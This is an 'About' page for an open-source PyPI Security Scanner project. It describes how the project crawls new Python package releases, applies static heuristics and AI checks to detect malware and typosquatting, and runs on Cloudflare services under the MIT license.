About PyPI Security Scanner

PyPI Security Scanner is an automated open-source project dedicated to securing the Python package ecosystem by providing real-time malware analysis and engineering assessment for every new package release.

Our Mission

Open-source registries are increasingly targeted by supply chain attacks, package typosquatting, malicious install scripts, and credential stealers. The PyPI Security Scanner actively monitors the official PyPI package index, feeding publishes into a serverless scanner pipeline. By combining static threat heuristics with AI-driven threat intelligence, we provide transparent security scores and immediate alerts to developers.

How It Works

• Continuous Crawling: The background worker polls the PyPI RSS feed every 15 minutes.
• Static Threat Heuristics: We analyze Python wheels and setup files for obfuscated payloads, outbound network calls, subprocess launches, and Levenshtein-based typosquatting.
• Multi-stage AI Evaluation: High-risk packages undergo reasoning workflows via Featherless API models to confirm or dismiss heuristic alerts.

Technology Stack

The platform operates on a fast, decentralized architecture using:

• Cloudflare Workers: Scalable serverless triggers for scanning ingestion logic.
• Cloudflare D1 Database: SQL storage for scanning status, metadata metrics, and final verdicts.
• Cloudflare Pages: Serverless layout rendering using Pages Functions.

Open Source License

PyPI Security Scanner is open-source software and is licensed under the terms of the MIT License. Developers and researchers are welcome to review the code, build on the scanner engine, or deploy customized instances of the system.